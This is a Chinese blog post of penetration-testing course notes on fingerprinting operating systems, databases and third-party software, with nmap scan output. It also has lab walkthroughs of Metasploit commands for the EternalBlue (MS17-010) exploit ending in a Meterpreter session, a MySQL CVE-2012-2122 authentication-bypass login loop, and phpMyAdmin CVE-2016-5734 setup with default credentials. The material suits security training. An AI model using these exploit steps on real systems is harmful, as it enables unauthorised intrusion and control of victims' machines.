第五天:基础入门-系统及数据库等

最新推荐文章于 2024-03-29 10:11:31 发布
最新推荐文章于 2024-03-29 10:11:31 发布
阅读量185 收藏
点赞数
文章标签: 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/menpan/article/details/130226776
版权

基础入门-系统及数据库等

前言:除去前期讲到过的搭建平台中间件,网站源码外,容易受到攻击的还有操作系统,数据库,第三方软件平台等,其中此类攻击也能直接影响到WEB或服务器的安全,导致网站或服务器权限的获取。

一、操作系统层面

1、识别操作系统常见方法

  • 有网站
    • 可以通过大小写判断
    • Windows对大小写不敏感,Linux对大小写敏感
  • 没有网站
    • 可以通过nmap扫描
    • 命令 nmap -O IP地址
┌──(root💀kali)-[~]
└─# nmap -O 47.75.212.155
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-17 15:02 CST
Nmap scan report for 47.75.212.155
Host is up (0.099s latency).
Not shown: 989 closed ports
PORT      STATE    SERVICE
22/tcp    filtered ssh
80/tcp    open     http
135/tcp   filtered msrpc
139/tcp   filtered netbios-ssn
445/tcp   filtered microsoft-ds
3306/tcp  open     mysql
3389/tcp  filtered ms-wbt-server
8888/tcp  open     sun-answerbook
49152/tcp open     unknown
49153/tcp open     unknown
49154/tcp open     unknown
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|Vista|8.1|2012 (98%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1:r1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (98%), Microsoft Windows 7 SP1 (94%), Microsoft Windows 7 or Windows Server 2008 R2 (94%), Microsoft Windows Server 2008 or 2008 Beta 3 (94%), Microsoft Windows 7 (94%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (94%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (94%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (94%), Microsoft Windows Vista SP2 (94%), Microsoft Windows Server 2008 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 24 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.43 seconds

2、简要两者区别及识意义

  • 区别出不同的操作系统才能准确的进行测试、因为windows和linux的漏洞是不一样的

3、操作系统层面漏洞类型对应意义

  • 不同的漏洞,利用的条件不同。

4、简要识别操作系统层面漏洞影响范围

  • 有些漏洞能获取操作系统权限,有些漏洞只能对操作系统照成干扰

二、数据库层面

1、识别数据库类型常见方法

  • 语言:
    • 组合类型asp + access/mssql
    • 组合类型php + mysql
    • 组合类型aspx+mssql
    • 组合类型jsp +mysql/oracle
    • 组合类型Python + MongoDB
  • 操作系统:
    • access, mssql只能安装到Windows操作系统上,其他数据库两种系统都可以安装

2、数据库类型区别及识别意义

  • 数据库类型不同表示的结构和漏洞也是不同
  • 不同的数据库的攻击方式也不同

3、数据库常见漏洞类型及攻击

  • 强力(或非强力)破解弱口令或默认的用户名及口令
  • 特权提升
  • 利用未用的和不需要的数据库服务和和功能中的漏洞
  • 针对未打补丁的数据库漏洞
  • SQL注入

4、简要数据库层面漏洞影响范围

  • 参考数据库的重要程来判定影响范围

三、第三方层面

1、如何判断有那些第三方平台或软件

  • 通过nmap扫描可以判断有那些第三方平台或软件
  • 命令:nmap -O -sV IP地址
┌──(root💀kali)-[~]
└─# nmap -O -sV 47.75.212.155   
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-17 21:07 CST
Nmap scan report for 47.75.212.155
Host is up (0.084s latency).
Not shown: 990 closed ports
PORT      STATE    SERVICE            VERSION
80/tcp    open     http               Apache httpd 2.4.46 ((Win32) OpenSSL/1.1.1g mod_fcgid/2.3.9a)
135/tcp   open     msrpc              Microsoft Windows RPC
139/tcp   open     netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   filtered microsoft-ds
3306/tcp  open     mysql              MySQL (unauthorized)
3389/tcp  open     ssl/ms-wbt-server?
8888/tcp  open     http               Ajenti http control panel
49152/tcp open     msrpc              Microsoft Windows RPC
49153/tcp open     msrpc              Microsoft Windows RPC
49154/tcp open     msrpc              Microsoft Windows RPC
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|2012|Vista|8.1 (96%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_8.1:r1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (96%), Microsoft Windows Server 2008 R2 or Windows 8 (95%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (95%), Microsoft Windows 7 (92%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 or 2008 Beta 3 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 25 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.77 seconds

2、简要为什么要识别第三方平台或软件

  • 不同的第三方软件或工具存在不同的漏洞、识别到越多的信息,收集到的漏洞也就越多

3、常见第三方平台或软件漏洞类型及攻击

  • 弱口令
  • 版本漏洞

4、简要第三方平台或软件安全测试的范围

  • 直接获取到软件的权限便于进一步的提权和攻击

四、补充

除去常规WEB安全及APP安全测试外,类似服务器单一或复杂的其他服务(邮件,游戏,负载均衡等),也可以作为安全测试目标,此类目标测试原则只是少了WEB应用或其他安全问题。所以明确安全测试思路是很重要的!

课程安排→漏洞技术→WEB层面→系统层面→第三方等其他

案例演示

1、上述涉及的基础知识演示

2、某操作系统层面漏洞演示

  • 永恒之蓝漏洞(ms17-010)

msfconsole //启动msfconsole

search ms17-010 //搜索ms17-010相关模块,可以看到一共找到了6个不同的模块

use auxiliary/scanner/smb/smb_ms17_010 //加载扫描模块

show options //查看配置选项

use exploit/windows/smb/ms17_010_eternalblue //使用永恒之蓝攻击模块:exploit/windows/smb/ms17_010_eternalblue

set payload //设置攻击载荷

set rhosts 192.168.110.237 //查看选项并设置rhosts

exploit //输入exploit开始攻击

运行成功会出现meterpreter > //Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。

screenshot //捕获屏幕

3、某数据库弱口令及漏洞演示

  • MySql身份认证绕过漏洞(CVE-2012-2122)

主机:192.168.217.11

cd /path/to/vuln/vulhub/mysql/CVE-2012-2122 //进入漏洞环境目录

docker-compose up -d //启动测试环境

在浏览器中浏览 //默认端口3306

for i in seq 1 1000; do mysql -uroot -pwrong -h 192.168.217.111 -P3306 ; done //在不知道我们环境正确密码的情况下,运行命令,在一定数量尝试后便可成功登录

4、某第三方应用安全漏洞演示

  • phpMyAdmin 4.0.x-4.6.2 远程代码执行漏洞(CVE-2016-5734)

cd /path/to/vuln/vulhub/phpmyadmin/CVE-2016-5734 //进入漏洞环境目录

docker-compose up -d //启动测试环境

在浏览器中浏览 //默认端口8080

默认账户root

原始密码root

涉及资源

https://nmap.org/ nmap
https://www.kali.org/get-kali/ Kali
https://github.com/hellogoldsnakeman/masnmapscan-V1.0

一只弱弱的小小鸟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
域渗透综合项目实战
干铮的博客
02-27 4743
1.项目网络拓扑 2.信息收集 netdiscover主机发现 sudo netdiscover -i eth0 -r 192.168.3.0/24 Nmap端口扫描 nmap -A 192.168.3.45 -p- -oN nmap.a
一个完整的内网渗透是什么样子的
kali_Ma的博客
08-12 3912
0x00 前言 今天这篇文章将试图呈现一个完整的内网渗透过程。文章略长,如果感兴趣的话,请耐心阅读! 0x01 案例分析 实验环境: 目标环境:10.0.0.0/24, 10.0.1.0/24 攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Windows) 渗透过程: 基本的主机探测: root@kali:~# nmap -sn 10.0.0.0/24 -oG online.txt root@kali:~# cat online.txt | grep -i up Host:
MSF 内网渗透(案例)
热门推荐
3569
06-03 2万+
0x00 前言虽然渗透,但是不常使用msf进行内网渗透,这篇刚好的弥补了 win 和 linux shell 和 msf 的对接的流程。原文 : https://mp.weixin.qq.com/s/sKXWjgaViYsCjG33-5Ey8Q0x01 案例分析实验环境:目标环境:10.0.0.0/24, 10.0.1.0/24攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Win...
MSRPC(MicroSoft Remote Procedure Call,微软远程过程调用)
LYSM
03-04 9087
背景 偶然发现普通管理员(非 Administrator),在右键管理员权限运行 A.exe 时,使用 ProcessMonistrator 观察这个进程被 explorer 创建,但是 hook explorer 的进程创建 api 却拦截不到 A.exe 的创建,之后尝试全局注入 dll ,发现创建 A.exe 的竟然是 svchost.exe ! 回头看 ProcessMonistrator 中 explorer 的创建进程时的调用栈,发现里面有很多 rpc 相关的函数,所以应该是 explorer
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)_msf漏洞扫描
最新发布
2201_75735270的博客
03-29 3404
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
第04天:基础入门-WEB源码拓展1
08-03
在获取源码后,安全测试人员应进行本地安全测试和代码审计,识别潜在漏洞,例如通过分析数据库备份文件(如.bak)来了解系统架构。对于无法直接获取源码的情况,可以尝试寻找公开信息或利用已知漏洞进行攻击。 7. ...
数据库系统基础教程_数据库基础_数据库系统_数据库pdf_
10-04
本教程“数据库系统基础教程”涵盖了数据库领域的基础知识,适合初学者入门学习。这里我们将深入探讨其中的关键概念和技术。 一、数据库基础 1. 数据与数据库:数据是信息的载体,而数据库是组织和管理这些数据的...
图书:Hibernate入门 - 第二版
03-27
5. **CRUD操作**:覆盖创建(Create)、读取(Read)、更新(Update)和删除(Delete)数据的基础操作,包括对象的保存、加载、更新和删除方法。 6. **查询语言HQL与 Criteria API**:介绍Hibernate特有的查询语言...
MySQL数据库基础实例教程(第2版)教学大纲.pdf
06-24
《MySQL数据库基础实例教程(第2版)》是一门针对软件技术、移动互联等相关专业设计的专业必修课程,旨在培养学生对数据库应用系统的开发、管理和维护能力。课程通过项目模拟和职业体验式学习,使学生在理论与实践中...
SQLServer从入门到精通第1章数据库基础ppt课件.ppt
11-13
"SQL Server从入门到精通第1章数据库基础ppt课件.ppt" 本资源是关于SQL Server数据库基础知识的PPT课件,涵盖了数据库系统的基本概念、关系数据库、非关系数据库、SQL Server 2008的安装、使用帮助、特点等内容。 ...
【webhack123】域靶场渗透
three_1996的博客
03-17 1140
由于域控管理员未在web服务器主机上登录过,没有抓取到域控的NLTM,此处需要模拟社工手段,让域控管理员在域内主机登录一次后再次抓取。1、进入系统后台管理界面,熟悉界面,发现系统设置中可以修改允许上传的文件类型,将此处添加php,exe。获得域“hackbox.com”中 DC 的列表(从“\\dc.hackbox.com”中)。主 DNS 后缀 . . . . . . . . . . . : hackbox.com。基于WEB的session,使用autoroute后,就拥有了访问\\DC内网的路由。
nmap扫描常用命令详解
鹿鸣天涯
09-12 2万+
常用命令:-vv是详细信息 nmap -vv -sT -sV -Pn 192.168.200.14 -p 1433 nmap -sT -sV -Pn 192.168.200.14 -p 1433 -sT TCP connect()扫描,这种方式会在目标主机的日志中记录大批连接请求和错误信息。 -sS 半开扫描,很少有系统能把它记入系统日志。不过,需要Root权限。 -sF -sN 秘密FIN数据包扫描、Xmas Tree、Null扫描模式 -s...
Nmap食用手册
qq_42378173的博客
01-02 3328
nmap
vulstack2(hydra爆mssql、免杀360、cs、msf渗透、weblogic、computer brower服务支持6118,域管密码过期kerberos认证错误导致部分域服务不可用)
qq_45290991的博客
09-24 1751
很久之前打了第一个靶场,但是打的不全,不舒坦,不够彻底,由于一直报rpc连接失败所以有的步骤不顺,这次学了一点小小的免杀技巧,过来带着练习的心态学学这个靶场。 0、环境搭建(难点) 环境搭建参考:漏洞详情 【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园 红日靶场二 WalkThrough – Crispr –热爱技术和生活 记得要在web机子里面手动开启服务,在 C:\Oracle\Middleware\user_projects\doma
学习使用nmap(一)
困兽犹斗
04-12 2万+
参考网页: http://nmap.org/man/zh/ 前提知识: nmap将端口分为open(开放的),filtered(被过滤的), closed(关闭的),或者unfiltered(未被过滤的)。 open意味着目标主机的应用程序在监听(listen) closed意味着端口没有监听,但随时可能打开。 filtered意味着firewall,阻碍了端口访问
VulnStack靶场二
aming小老弟
04-19 2049
ATT&CK红队评估实战靶场二0x00 靶场搭建防火墙策略运行weblogic启动脚本net view 显示 6118 error0x01 渗透实战 红队实战系列,主要以真实企业环境为实例搭建一系列靶场 本次红队环境 关键词:威胁情报 | 内网渗透 | Kill Chain | 域渗透 | 安全靶场 Bypass UAC Windows系统NTLM获取(理论知识:Windows认证) Access Token利用(MSSQL利用) WMI利用 网页代理,二层代理,特殊协议代理(DNS,I
Nmap扫描教程之基础扫描详解
大学霸__IT达人
06-29 2万+
Nmap扫描教程之基础扫描详解
【渗透测试】利用永恒之蓝漏洞实现桌面监控
weixin_43358075的博客
01-04 4230
声明:本次使用的是虚拟机环境,旨在演示如何使用nmap和msfconsole这两款工具。 一、 NMAP扫描 利用nmap 192.168.56.0/24这条命令扫描192.168.56.1 - 192.168.56.255之间的主机,这时候我们发现活跃在局域网上的主机有两台,分别是192.168.56.1和192.168.56.3,其中192.168.56.3是我们即将要攻击的靶机,19...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值